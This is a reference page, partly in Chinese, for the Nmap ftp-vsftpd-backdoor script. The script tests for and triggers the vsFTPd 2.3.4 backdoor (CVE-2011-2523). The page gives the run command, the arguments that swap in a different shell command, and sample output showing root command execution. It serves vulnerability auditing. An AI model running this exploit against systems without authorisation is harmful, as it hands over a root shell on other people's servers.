ftp-vsftpd-backdoor
脚本使用类型:
portrule
脚本所属分类:
exploit, intrusive, malware, vuln
脚本下载地址: http://nmap.org/svn/scripts/ftp-vsftpd-backdoor.nse
Tests for the presence of the vsFTPd 2.3.4 backdoor reported on 2011-07-04
(CVE-2011-2523). This script attempts to exploit the backdoor using the
innocuous id
command by default, but that can be changed with
the exploit.cmd
or ftp-vsftpd-backdoor.cmd
script
arguments.
References: * http://scarybeastsecurity.blogspot.com/2011/07/alert-vsftpd-download-backdoored.html * https://dev.metasploit.com/redmine/projects/framework/repository/revisions/13093 * http://cve.mitre.org/cgi-bin/cvekey.cgi?keyword=CVE-2011-2523
or ftp-vsftpd-backdoor.cmd Command to execute in shell
(default is id
).
执行格式
nmap --script ftp-vsftpd-backdoor -p 21 <host>
PORT STATE SERVICE 21/tcp open ftp | ftp-vsftpd-backdoor: | VULNERABLE: | vsFTPd version 2.3.4 backdoor | State: VULNERABLE (Exploitable) | IDs: CVE:CVE-2011-2523 OSVDB:73573 | Description: | vsFTPd version 2.3.4 backdoor, this was reported on 2011-07-04. | Disclosure date: 2011-07-03 | Exploit results: | The backdoor was already triggered | Shell command: id | Results: uid=0(root) gid=0(root) groups=0(root) | References: | http://osvdb.org/73573 | http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2523 | http://scarybeastsecurity.blogspot.com/2011/07/alert-vsftpd-download-backdoored.html |_ https://dev.metasploit.com/redmine/projects/framework/repository/revisions/13093
Author: Daniel Miller
License: VER007 整理 http://www.ver007.com